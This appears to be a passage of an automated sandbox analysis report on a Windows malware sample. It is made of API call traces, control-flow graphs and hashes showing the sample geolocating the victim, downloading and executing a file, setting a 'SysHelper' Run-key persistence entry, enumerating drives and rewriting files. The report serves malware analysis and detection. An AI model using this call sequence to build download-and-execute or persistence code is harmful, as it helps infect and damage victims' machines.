                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00000000,?), ref: 00481381
                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00481388
                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?), ref: 004813E6
                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00025805,?,00000000,?,00000000,?), ref: 00481409
                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?), ref: 00481417
                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 0048141E
                                                                                                  • lstrlenA.KERNEL32(?,?,00000000,?), ref: 00481471
                                                                                                  • lstrlenA.KERNEL32(?,?,?,00000000,?), ref: 00481491
                                                                                                  • lstrlenA.KERNEL32(?,00000000,?,?,?,?,?,00000000,?), ref: 004814CF
                                                                                                  • SetFilePointer.KERNEL32(00000000,00000005,00000000,00000000,00000005,00000000,-000000FB,-000000FB,00000000,00000000,000000FF,00000000,00000000,00000000), ref: 0048159D
                                                                                                  • SetFilePointerEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 004815D0
                                                                                                  • WriteFile.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 004815F8
                                                                                                  • WriteFile.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00481649
                                                                                                  • lstrlenA.KERNEL32({36A698B9-D67C-4E07-BE82-0EC5B14B4DF5},00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0048166B
                                                                                                  • WriteFile.KERNEL32(00000000,{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5},00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00481678
                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 0048168D
                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 004816D6
                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004816EB
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: File$CloseHandleVirtual$FreePointerlstrlen$Write$MoveRead$AllocCreateSize_memset
                                                                                                  • String ID: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                  • API String ID: 254274740-1186676987
                                                                                                  • Opcode ID: 4c3fa3e5657098e4de49b9cee49ab0e945520af04202c808b00d73a3657ca6e8
                                                                                                  • Instruction ID: c7778ad01d416958a87c493a96a9199b233a7d490a3378bf70366ba309a34745
                                                                                                  • Opcode Fuzzy Hash: 4c3fa3e5657098e4de49b9cee49ab0e945520af04202c808b00d73a3657ca6e8
                                                                                                  • Instruction Fuzzy Hash: 2222D070D00208EFDB14EBA4DC85BEEBBB8EF05304F10456AF515B72A1DB785A49CB69
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1412 48dbd0-48dcea call 49f7c0 call 483ff0 call 4856d0 call 483ff0 call 47ecb0 1423 48e459-48e45f 1412->1423 1424 48dcf0-48dd82 LoadLibraryW GetProcAddress call 483c40 UuidCreate UuidToStringA 1412->1424 1426 48e498-48e4a0 1423->1426 1427 48e461-48e465 1423->1427 1441 48dd88-48dd8d 1424->1441 1442 48dd84-48dd86 1424->1442 1428 48e4b1-48e4c7 1426->1428 1429 48e4a2-48e4ae call 492587 1426->1429 1431 48e48f-48e495 call 492587 1427->1431 1432 48e467-48e46b 1427->1432 1429->1428 1431->1426 1433 48e46d-48e474 call 492587 1432->1433 1434 48e477-48e48d 1432->1434 1433->1434 1434->1431 1434->1432 1445 48dd90-48dd95 1441->1445 1444 48dd99-48de83 call 4856d0 RpcStringFreeA PathAppendA CreateDirectoryA call 4884e0 call 483ff0 call 482900 call 483580 1442->1444 1457 48de94-48de99 1444->1457 1458 48de85-48de91 call 492587 1444->1458 1445->1445 1446 48dd97 1445->1446 1446->1444 1460 48e3da-48e3e2 1457->1460 1461 48de9f-48dea3 1457->1461 1458->1457 1463 48e3f3-48e419 1460->1463 1464 48e3e4-48e3f0 call 492587 1460->1464 1465 48dea7-48debc call 484300 1461->1465 1467 48e42a-48e44a 1463->1467 1468 48e41b-48e427 call 492587 1463->1468 1464->1463 1476 48debe-48dec2 1465->1476 1477 48ded0-48df5a call 49b420 InternetOpenA call 483ff0 call 482900 call 491c02 1465->1477 1473 48e44c-48e452 call 492587 1467->1473 1474 48e455 1467->1474 1468->1467 1473->1474 1474->1423 1479 48dec8 1476->1479 1480 48dec4-48dec6 1476->1480 1491 48df60-48df9c call 484690 call 47dd40 1477->1491 1492 48e031-48e075 call 484690 call 482840 1477->1492 1483 48deca-48dece 1479->1483 1480->1483 1483->1477 1501 48df9e-48dfa3 1491->1501 1502 48e014-48e01c 1491->1502 1503 48e079-48e08b InternetOpenUrlA 1492->1503 1504 48e077 1492->1504 1509 48dfb1-48dfcc 1501->1509 1510 48dfa5-48dfae call 492587 1501->1510 1507 48e02d 1502->1507 1508 48e01e-48e02a call 492587 1502->1508 1505 48e09c-48e0bc 1503->1505 1506 48e08d-48e099 call 492587 1503->1506 1504->1503 1512 48e0be-48e0cb 1505->1512 1513 48e0e2-48e11b HttpQueryInfoW 1505->1513 1506->1505 1507->1492 1508->1507 1516 48dfce-48dfd2 1509->1516 1517 48dfe7-48dfed 1509->1517 1510->1509 1520 48e0d1-48e0dd call 492587 1512->1520 1521 48e3c2-48e3cd 1512->1521 1513->1512 1523 48e11d-48e15f call 483ff0 call 48e5b0 1513->1523 1519 48dff3-48e011 1516->1519 1525 48dfd4-48dfe5 call 4905a0 1516->1525 1517->1519 1519->1502 1520->1521 1521->1465 1529 48e3d3 1521->1529 1535 48e161-48e16f 1523->1535 1536 48e174-48e19f call 48e5b0 call 483010 1523->1536 1525->1519 1529->1460 1535->1536 1541 48e1a1-48e1a6 1536->1541 1542 48e1d3-48e1db 1536->1542 1543 48e1a8-48e1b1 call 492587 1541->1543 1544 48e1b4-48e1ce call 483d40 1541->1544 1545 48e1ec-48e248 lstrcpyA PathAppendA 1542->1545 1546 48e1dd-48e1e9 call 492587 1542->1546 1543->1544 1544->1542 1550 48e24a-48e24c 1545->1550 1551 48e24e-48e250 1545->1551 1546->1545 1552 48e25c-48e293 call 4856d0 CreateFileA 1550->1552 1553 48e253-48e258 1551->1553 1559 48e299-48e2a9 SetFilePointer 1552->1559 1560 48e353-48e358 1552->1560 1553->1553 1556 48e25a 1553->1556 1556->1552 1559->1560 1563 48e2af 1559->1563 1561 48e35a-48e363 call 492587 1560->1561 1562 48e366-48e380 1560->1562 1561->1562 1565 48e38e-48e3b0 1562->1565 1566 48e382-48e38b call 492587 1562->1566 1567 48e2b1-48e2cf InternetReadFile 1563->1567 1572 48e3be 1565->1572 1573 48e3b2-48e3bb call 492587 1565->1573 1566->1565 1570 48e2d1-48e2da 1567->1570 1571 48e314 1567->1571 1570->1571 1575 48e2dc-48e303 WriteFile 1570->1575 1577 48e316-48e32e CloseHandle InternetCloseHandle * 2 1571->1577 1572->1521 1573->1572 1575->1577 1578 48e305-48e310 1575->1578 1577->1560 1580 48e330-48e332 1577->1580 1578->1567 1582 48e312 1578->1582 1580->1560 1581 48e334-48e34d ShellExecuteA 1580->1581 1581->1560 1582->1577
                                                                                                  APIs
                                                                                                    • Part of subcall function 0047ECB0: _strtok.LIBCMT ref: 0047ED66
                                                                                                  • LoadLibraryW.KERNEL32(Shell32.dll), ref: 0048DCF5
                                                                                                  • GetProcAddress.KERNEL32(00000000,SHGetFolderPathA), ref: 0048DD01
                                                                                                    • Part of subcall function 00483C40: _memset.LIBCMT ref: 00483C83
                                                                                                  • UuidCreate.RPCRT4(?), ref: 0048DD3C
                                                                                                  • UuidToStringA.RPCRT4(?,?), ref: 0048DD57
                                                                                                  • RpcStringFreeA.RPCRT4(00000000), ref: 0048DDB4
                                                                                                  • PathAppendA.SHLWAPI(?,00000000), ref: 0048DDD3
                                                                                                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 0048DDDC
                                                                                                  • _memset.LIBCMT ref: 0048DEE7
                                                                                                  • InternetOpenA.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0048DEFC
                                                                                                    • Part of subcall function 00482900: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000010,-000003FF,-000003FF), ref: 00482966
                                                                                                  • _wcsstr.LIBCMT ref: 0048DF50
                                                                                                  • InternetOpenUrlA.WININET(00000000,00000000), ref: 0048E07B
                                                                                                    • Part of subcall function 0047DD40: _wcsstr.LIBCMT ref: 0047DD8D
                                                                                                    • Part of subcall function 0047DD40: _wcsstr.LIBCMT ref: 0047DDB6
                                                                                                    • Part of subcall function 0047DD40: _memset.LIBCMT ref: 0047DDE4
                                                                                                    • Part of subcall function 0047DD40: lstrlenW.KERNEL32(?), ref: 0047DE0A
                                                                                                    • Part of subcall function 0047DD40: gethostbyname.WS2_32(00570134), ref: 0047DEA7
                                                                                                  • _memmove.LIBCMT ref: 0048DFDD
                                                                                                  • HttpQueryInfoW.WININET(00000000,20000013,?,00000000,00000000), ref: 0048E10D
                                                                                                  • lstrcpyA.KERNEL32(?,?), ref: 0048E229
                                                                                                  • PathAppendA.SHLWAPI(?,?), ref: 0048E23F
                                                                                                  • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?), ref: 0048E288
                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0048E2A0
                                                                                                  • InternetReadFile.WININET(00000000,?,00002800,?), ref: 0048E2C7
                                                                                                  • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0048E2FB
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0048E317
                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0048E324
                                                                                                  • InternetCloseHandle.WININET(?), ref: 0048E32A
                                                                                                  • ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 0048E34D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Internet$File$CloseCreateHandle_memset_wcsstr$AppendOpenPathStringUuid$AddressByteCharDirectoryExecuteFreeHttpInfoLibraryLoadMultiPointerProcQueryReadShellWideWrite_memmove_strtokgethostbynamelstrcpylstrlen
                                                                                                  • String ID: $run$.bit/$Microsoft Internet Explorer$SHGetFolderPathA$Shell32.dll
                                                                                                  • API String ID: 1843630811-800396732
                                                                                                  • Opcode ID: 1512850cf29def946f458033ce525f2e6b057c59b94ef1692ad3cf8591bcbd68
                                                                                                  • Instruction ID: 25ee2063cc39706985fb6d5664dd5e16cc1303bd088bfa736d2b438df6a61a51
                                                                                                  • Opcode Fuzzy Hash: 1512850cf29def946f458033ce525f2e6b057c59b94ef1692ad3cf8591bcbd68
                                                                                                  • Instruction Fuzzy Hash: ED329C70508380ABE730EF25C849B9FBBE4AF91708F104D1EF59957292D7BA9508CB97
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1583 482220-48228a call 49f7c0 GetCommandLineW CommandLineToArgvW PathFindFileNameW LoadLibraryW GetProcAddress * 3 1586 48228c-4822ba LoadLibraryW GetProcAddress * 3 1583->1586 1587 4822bd-4822d1 K32EnumProcesses 1583->1587 1586->1587 1588 4822df-4822ec 1587->1588 1589 4822d3-4822de 1587->1589 1590 4822ee 1588->1590 1591 482353-48235b 1588->1591 1592 4822f0-482308 OpenProcess 1590->1592 1593 48230a-48231a K32EnumProcessModules 1592->1593 1594 482346-482351 CloseHandle 1592->1594 1593->1594 1595 48231c-482339 K32GetModuleBaseNameW call 490235 1593->1595 1594->1591 1594->1592 1597 48233e-482343 1595->1597 1597->1594 1598 482345 1597->1598 1598->1594
                                                                                                  APIs
                                                                                                  • GetCommandLineW.KERNEL32 ref: 00482235
                                                                                                  • CommandLineToArgvW.SHELL32(00000000,?), ref: 00482240
                                                                                                  • PathFindFileNameW.SHLWAPI(00000000), ref: 00482248
                                                                                                  • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00482256
                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0048226A
                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00482275
                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00482280
                                                                                                  • LoadLibraryW.KERNEL32(Psapi.dll), ref: 00482291
                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0048229F
                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004822AA
                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004822B5
                                                                                                  • K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 004822CD
                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,?), ref: 004822FE
                                                                                                  • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00482315
                                                                                                  • K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 0048232C
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00482347
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
                                                                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
                                                                                                  • API String ID: 3668891214-3807497772
                                                                                                  • Opcode ID: 7c059361a0c6d333d264fea6d6be256e8a21c3bf8adcbc14672fdb8a111f53d7
                                                                                                  • Instruction ID: 500fb70e50f4fed89e3d4605f843393a08231360f5920979de36ef61f03e97a8
                                                                                                  • Opcode Fuzzy Hash: 7c059361a0c6d333d264fea6d6be256e8a21c3bf8adcbc14672fdb8a111f53d7
                                                                                                  • Instruction Fuzzy Hash: 28315571E00219AFDF10AFE5DC45EAEBBB8FF55704F004466F904E2250DBB49A059F95
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • timeGetTime.WINMM ref: 0048F15E
                                                                                                  • Sleep.KERNEL32(?), ref: 0048F185
                                                                                                  • Sleep.KERNEL32(?), ref: 0048F19D
                                                                                                  • SendMessageW.USER32(?,00008003,00000000,00000000), ref: 0048F9D0
                                                                                                    • Part of subcall function 00480A50: GetLogicalDrives.KERNEL32 ref: 00480A75
                                                                                                    • Part of subcall function 00480A50: SetErrorMode.KERNEL32(00000001,00570234,00000002), ref: 00480AE2
                                                                                                    • Part of subcall function 00480A50: PathFileExistsA.SHLWAPI(?), ref: 00480AF9
                                                                                                    • Part of subcall function 00480A50: SetErrorMode.KERNEL32(00000000), ref: 00480B02
                                                                                                    • Part of subcall function 00480A50: GetDriveTypeA.KERNEL32(?), ref: 00480B1B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorModeSleep$DriveDrivesExistsFileLogicalMessagePathSendTimeTypetime
                                                                                                  • String ID: C:\
                                                                                                  • API String ID: 3672571082-3404278061
                                                                                                  • Opcode ID: c07174324b2e77524f11d9e42b401d6d0137e78fe3ecb05074e369d18cf7f982
                                                                                                  • Instruction ID: c617db7b04de8a13ece1324b3f5d001d2fea998f59f771b020a4f045590472f4
                                                                                                  • Opcode Fuzzy Hash: c07174324b2e77524f11d9e42b401d6d0137e78fe3ecb05074e369d18cf7f982
                                                                                                  • Instruction Fuzzy Hash: 0D428275D003059BDF24EFA8C88579EBBF1BF44308F14492EE845AB381E779A909CB95
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 2199 47cf10-47cfb0 call 49f7c0 call 49b420 InternetOpenW call 485c10 InternetOpenUrlW 2206 47cfb2-47cfb4 2199->2206 2207 47cfb9-47cffb InternetReadFile InternetCloseHandle * 2 call 4856d0 2199->2207 2209 47d213-47d217 2206->2209 2210 47d000-47d01d 2207->2210 2211 47d224-47d236 2209->2211 2212 47d219-47d221 call 492587 2209->2212 2213 47d023-47d02c 2210->2213 2214 47d01f-47d021 2210->2214 2212->2211 2217 47d030-47d035 2213->2217 2216 47d039-47d069 call 4856d0 call 484300 2214->2216 2224 47d06f-47d08b call 483010 2216->2224 2225 47d1cb 2216->2225 2217->2217 2219 47d037 2217->2219 2219->2216 2234 47d08d-47d091 2224->2234 2235 47d0b9-47d0bd 2224->2235 2226 47d1cd-47d1d1 2225->2226 2228 47d1d3-47d1db call 492587 2226->2228 2229 47d1de-47d1f4 2226->2229 2228->2229 2232 47d1f6-47d1fe call 492587 2229->2232 2233 47d201-47d20f 2229->2233 2232->2233 2233->2209 2240 47d093-47d09b call 492587 2234->2240 2241 47d09e-47d0b4 call 483d40 2234->2241 2237 47d0bf-47d0ca call 492587 2235->2237 2238 47d0cd-47d0e1 call 484300 2235->2238 2237->2238 2238->2225 2250 47d0e7-47d149 call 483010 2238->2250 2240->2241 2241->2235 2253 47d150-47d15a 2250->2253 2254 47d160-47d162 2253->2254 2255 47d15c-47d15e 2253->2255 2257 47d165-47d16a 2254->2257 2256 47d16e-47d18b call 47b650 2255->2256 2261 47d18d-47d18f 2256->2261 2262 47d19a-47d19e 2256->2262 2257->2257 2258 47d16c 2257->2258 2258->2256 2261->2262 2263 47d191-47d198 2261->2263 2262->2253 2264 47d1a0 2262->2264 2263->2262 2265 47d1c7-47d1c9 2263->2265 2266 47d1a2-47d1a6 2264->2266 2265->2266 2267 47d1b3-47d1c5 2266->2267 2268 47d1a8-47d1b0 call 492587 2266->2268 2267->2226 2268->2267
                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 0047CF4A
                                                                                                  • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0047CF5F
                                                                                                  • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0047CFA6
                                                                                                  • InternetReadFile.WININET(00000000,?,00002800,?), ref: 0047CFCD
                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0047CFDA
                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0047CFDD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Internet$CloseHandleOpen$FileRead_memset
                                                                                                  • String ID: $"country_code":"$$$($Microsoft Internet Explorer$https://api.2ip.ua/geo.json
                                                                                                  • API String ID: 1485416377-933853286
                                                                                                  • Opcode ID: ebe480715f31e0a70da62e29e8211ba2a95fd02cc16c0f6a5c4f3217aa79f6ef
                                                                                                  • Instruction ID: f7543f2e0a08064662c2c5409f92c2baba0e7df97939a6920d4344f19eee911f
                                                                                                  • Opcode Fuzzy Hash: ebe480715f31e0a70da62e29e8211ba2a95fd02cc16c0f6a5c4f3217aa79f6ef
                                                                                                  • Instruction Fuzzy Hash: 6D91B070D00248EBEF20DFA0DD45BEEBBB4AF05708F60846AE40977281D7BA5A49DB55
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 2271 48bae0-48bb0d 2272 48bba0-48bba7 2271->2272 2273 48bb13 2271->2273 2274 48bf3d-48bf47 2272->2274 2275 48bbad-48bbae 2272->2275 2276 48bb54-48bb5e 2273->2276 2277 48bb15-48bb1a 2273->2277 2278 48bf49 2274->2278 2279 48bf5c-48bf63 2274->2279 2282 48bbb0-48bbd4 DefWindowProcW 2275->2282 2283 48bbd7-48bc45 call 490c62 GetComputerNameW call 483100 call 48ce80 2275->2283 2280 48bf81-48bf97 2276->2280 2281 48bb64-48bb68 2276->2281 2284 48bb1c-48bb1f 2277->2284 2285 48bb47-48bb4f PostQuitMessage 2277->2285 2286 48bf50-48bf54 2278->2286 2287 48bf9a-48bfc2 DefWindowProcW 2279->2287 2288 48bf65-48bf71 IsWindow 2279->2288 2289 48bb6a-48bb6e 2281->2289 2290 48bb75-48bb9d DefWindowProcW 2281->2290 2305 48bc7b-48bc80 2283->2305 2306 48bc47-48bc4c 2283->2306 2284->2280 2292 48bb25-48bb28 2284->2292 2285->2280 2286->2287 2293 48bf56-48bf5a 2286->2293 2288->2280 2294 48bf73-48bf7b DestroyWindow 2288->2294 2289->2281 2295 48bb70 2289->2295 2292->2282 2297 48bb2e-48bb31 2292->2297 2293->2279 2293->2286 2294->2280 2295->2280 2297->2280 2299 48bb37-48bb42 call 481cd0 2297->2299 2299->2288 2309 48bc8e-48bcb1 2305->2309 2310 48bc82-48bc8b call 492587 2305->2310 2307 48bc5a-48bc76 call 4845a0 2306->2307 2308 48bc4e-48bc57 call 492587 2306->2308 2307->2305 2308->2307 2314 48bcbf-48bcf1 call 490bed 2309->2314 2315 48bcb3-48bcbc call 492587 2309->2315 2310->2309 2322 48befb-48bf0f IsWindow 2314->2322 2323 48bcf7-48bcfa 2314->2323 2315->2314 2325 48bf28-48bf2d 2322->2325 2326 48bf11-48bf18 2322->2326 2324 48bd00-48bd04 2323->2324 2327 48bd0a-48bd0e 2324->2327 2328 48bee5-48bef1 2324->2328 2325->2280 2330 48bf2f-48bf3b call 492587 2325->2330 2326->2325 2329 48bf1a-48bf22 DestroyWindow 2326->2329 2327->2328 2331 48bd14-48bd7b call 484690 * 2 call 47eff0 2327->2331 2328->2324 2332 48bef7-48bef9 2328->2332 2329->2325 2330->2280 2341 48bee1 2331->2341 2342 48bd81-48be44 call 48c330 call 489d10 call 48c240 call 48b680 call 48b8b0 call 484690 call 48ce80 call 4831d0 2331->2342 2332->2322 2332->2325 2341->2328 2359 48be55-48be81 2342->2359 2360 48be46-48be52 call 492587 2342->2360 2361 48be8f-48bedf CreateThread 2359->2361 2362 48be83-48be8c call 492587 2359->2362 2360->2359 2361->2328 2362->2361
                                                                                                  APIs
                                                                                                  • PostQuitMessage.USER32(00000000), ref: 0048BB49
                                                                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 0048BBBA
                                                                                                  • _malloc.LIBCMT ref: 0048BBE4
                                                                                                  • GetComputerNameW.KERNEL32(00000000,?), ref: 0048BBF4
                                                                                                  • _free.LIBCMT ref: 0048BCD7
                                                                                                    • Part of subcall function 00481CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,0053AC68,000000FF), ref: 00481D12
                                                                                                    • Part of subcall function 00481CD0: _memset.LIBCMT ref: 00481D3B
                                                                                                    • Part of subcall function 00481CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00481D63
                                                                                                    • Part of subcall function 00481CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0053AC68,000000FF), ref: 00481D6C
                                                                                                    • Part of subcall function 00481CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00481DD6
